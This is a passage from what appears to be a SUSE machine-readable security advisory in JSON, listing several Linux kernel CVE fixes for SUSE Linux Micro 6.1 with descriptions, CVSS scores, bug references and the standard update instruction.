"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2025-71077"
},
{
"cve": "CVE-2025-71078",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71078"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\npowerpc/64s/slb: Fix SLB multihit issue during SLB preload\n\nOn systems using the hash MMU, there is a software SLB preload cache that\nmirrors the entries loaded into the hardware SLB buffer. This preload\ncache is subject to periodic eviction - typically after every 256 context\nswitches - to remove old entry.\n\nTo optimize performance, the kernel skips switch_mmu_context() in\nswitch_mm_irqs_off() when the prev and next mm_struct are the same.\nHowever, on hash MMU systems, this can lead to inconsistencies between\nthe hardware SLB and the software preload cache.\n\nIf an SLB entry for a process is evicted from the software cache on one\nCPU, and the same process later runs on another CPU without executing\nswitch_mmu_context(), the hardware SLB may retain stale entries. If the\nkernel then attempts to reload that entry, it can trigger an SLB\nmulti-hit error.\n\nThe following timeline shows how stale SLB entries are created and can\ncause a multi-hit error when a process moves between CPUs without a\nMMU context switch.\n\nCPU 0 CPU 1\n----- -----\nProcess P\nexec swapper/1\n load_elf_binary\n begin_new_exc\n activate_mm\n switch_mm_irqs_off\n switch_mmu_context\n switch_slb\n /*\n * This invalidates all\n * the entries in the HW\n * and setup the new HW\n * SLB entries as per the\n * preload cache.\n */\ncontext_switch\nsched_migrate_task migrates process P to cpu-1\n\nProcess swapper/0 context switch (to process P)\n(uses mm_struct of Process P) switch_mm_irqs_off()\n switch_slb\n load_slb++\n /*\n * load_slb becomes 0 here\n * and we evict an entry from\n * the preload cache with\n * preload_age(). We still\n * keep HW SLB and preload\n * cache in sync, that is\n * because all HW SLB entries\n * anyways gets evicted in\n * switch_slb during SLBIA.\n * We then only add those\n * entries back in HW SLB,\n * which are currently\n * present in preload_cache\n * (after eviction).\n */\n load_elf_binary continues...\n setup_new_exec()\n slb_setup_new_exec()\n\n sched_switch event\n sched_migrate_task migrates\n process P to cpu-0\n\ncontext_switch from swapper/0 to Process P\n switch_mm_irqs_off()\n /*\n * Since both prev and next mm struct are same we don\u0027t call\n * switch_mmu_context(). This will cause the HW SLB and SW preload\n * cache to go out of sync in preload_new_slb_context. Because there\n * was an SLB entry which was evicted from both HW and preload cache\n * on cpu-1. Now later in preload_new_slb_context(), when we will try\n * to add the same preload entry again, we will add this to the SW\n * preload cache and then will add it to the HW SLB. Since on cpu-0\n * this entry was never invalidated, hence adding this entry to the HW\n * SLB will cause a SLB multi-hit error.\n */\nload_elf_binary cont\n---truncated---",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71078",
"url": "https://www.suse.com/security/cve/CVE-2025-71078"
},
{
"category": "external",
"summary": "SUSE Bug 1256616 for CVE-2025-71078",
"url": "https://bugzilla.suse.com/1256616"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2025-71078"
},
{
"cve": "CVE-2025-71079",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71079"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet: nfc: fix deadlock between nfc_unregister_device and rfkill_fop_write\n\nA deadlock can occur between nfc_unregister_device() and rfkill_fop_write()\ndue to lock ordering inversion between device_lock and rfkill_global_mutex.\n\nThe problematic lock order is:\n\nThread A (rfkill_fop_write):\n rfkill_fop_write()\n mutex_lock(\u0026rfkill_global_mutex)\n rfkill_set_block()\n nfc_rfkill_set_block()\n nfc_dev_down()\n device_lock(\u0026dev-\u003edev) \u003c- waits for device_lock\n\nThread B (nfc_unregister_device):\n nfc_unregister_device()\n device_lock(\u0026dev-\u003edev)\n rfkill_unregister()\n mutex_lock(\u0026rfkill_global_mutex) \u003c- waits for rfkill_global_mutex\n\nThis creates a classic ABBA deadlock scenario.\n\nFix this by moving rfkill_unregister() and rfkill_destroy() outside the\ndevice_lock critical section. Store the rfkill pointer in a local variable\nbefore releasing the lock, then call rfkill_unregister() after releasing\ndevice_lock.\n\nThis change is safe because rfkill_fop_write() holds rfkill_global_mutex\nwhile calling the rfkill callbacks, and rfkill_unregister() also acquires\nrfkill_global_mutex before cleanup. Therefore, rfkill_unregister() will\nwait for any ongoing callback to complete before proceeding, and\ndevice_del() is only called after rfkill_unregister() returns, preventing\nany use-after-free.\n\nThe similar lock ordering in nfc_register_device() (device_lock -\u003e\nrfkill_global_mutex via rfkill_register) is safe because during\nregistration the device is not yet in rfkill_list, so no concurrent\nrfkill operations can occur on this device.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71079",
"url": "https://www.suse.com/security/cve/CVE-2025-71079"
},
{
"category": "external",
"summary": "SUSE Bug 1256619 for CVE-2025-71079",
"url": "https://bugzilla.suse.com/1256619"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 4.1,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2025-71079"
},
{
"cve": "CVE-2025-71081",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71081"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nASoC: stm32: sai: fix OF node leak on probe\n\nThe reference taken to the sync provider OF node when probing the\nplatform device is currently only dropped if the set_sync() callback\nfails during DAI probe.\n\nMake sure to drop the reference on platform probe failures (e.g. probe\ndeferral) and on driver unbind.\n\nThis also avoids a potential use-after-free in case the DAI is ever\nreprobed without first rebinding the platform driver.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71081",
"url": "https://www.suse.com/security/cve/CVE-2025-71081"
},
{
"category": "external",
"summary": "SUSE Bug 1256609 for CVE-2025-71081",
"url": "https://bugzilla.suse.com/1256609"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.4,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2025-71081"
},
{
"cve": "CVE-2025-71082",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71082"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nBluetooth: btusb: revert use of devm_kzalloc in btusb\n\nThis reverts commit 98921dbd00c4e (\"Bluetooth: Use devm_kzalloc in\nbtusb.c file\").\n\nIn btusb_probe(), we use devm_kzalloc() to allocate the btusb data. This\nties the lifetime of all the btusb data to the binding of a driver to\none interface, INTF. In a driver that binds to other interfaces, ISOC\nand DIAG, this is an accident waiting to happen.\n\nThe issue is revealed in btusb_disconnect(), where calling\nusb_driver_release_interface(\u0026btusb_driver, data-\u003eintf) will have devm\nfree the data that is also being used by the other interfaces of the\ndriver that may not be released yet.\n\nTo fix this, revert the use of devm and go back to freeing memory\nexplicitly.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71082",
"url": "https://www.suse.com/security/cve/CVE-2025-71082"
},
{
"category": "external",
"summary": "SUSE Bug 1256611 for CVE-2025-71082",
"url": "https://bugzilla.suse.com/1256611"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2025-71082"
},
{
"cve": "CVE-2025-71083",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71083"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ndrm/ttm: Avoid NULL pointer deref for evicted BOs\n\nIt is possible for a BO to exist that is not currently associated with a\nresource, e.g. because it has been evicted.\n\nWhen devcoredump tries to read the contents of all BOs for dumping, we need\nto expect this as well -- in this case, ENODATA is recorded instead of the\nbuffer contents.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71083",
